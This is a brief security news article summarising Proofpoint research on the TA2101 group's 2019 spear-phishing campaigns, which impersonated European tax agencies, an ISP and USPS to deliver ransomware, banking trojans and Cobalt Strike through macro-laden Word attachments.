ProofPoint researchers uncovered a new phishing scheme that targets several businesses and organizations in Germany, Italy, and the United States in order to infect their networks with malware. The attacks are orchestrated by a relatively new hacking crew, tracked as TA2101, that appears to be interested in businesses, IT services, manufacturing, and healthcare industries.
The threat actor uses legitimate and licensed penetration testing tools and backdoor framework such as Cobalt Strike and Metasploit to perform the post-exploitation operation. The malware is delivered via spear-phishing emails purported to be from financial regulatory agencies.
Between October and November 2019, Proofpoint researchers observed several campaigns that used malicious email messages to infect organizations in Germany, Italy, and the United States with backdoor, banking Trojan, or ransomware malware. In all observed cases the attackers used malicious Word document attachments as an initial vector to compromise the device.
Once opened, the attachment executes a Microsoft Office macro that, in turn, executes a PowerShell script, which downloads and installs one of the malicious payloads (Maxe ransomware, IcedID trojan or Cobalt Strike backdoor) onto the victim’s system.
In addition to social engineering, the hackers are also using stolen branding and lookalike domains of European taxation agencies and other public-facing entities such as Internet service providers to make phishing emails look even more convincing. In the recent campaigns the phishing emails were observed to impersonate the following entities:
Bundeszentralamt fur Steuern, the German Federal Ministry of Finance,
Agenzia Delle Entrate, the Italian Revenue Agency,
1&1 Internet AG, a German internet service provider,
USPS, the United States Postal Service.
“The increasing sophistication of these lures mirrors improved social engineering and a focus on effectiveness over quantity appearing in many campaigns globally across the email threat landscape,” the researchers concluded.
The more detailed analysis, as well as Indicators of Compromise (IoCs) related to the recent campaigns, are available in ProofPoint blog post.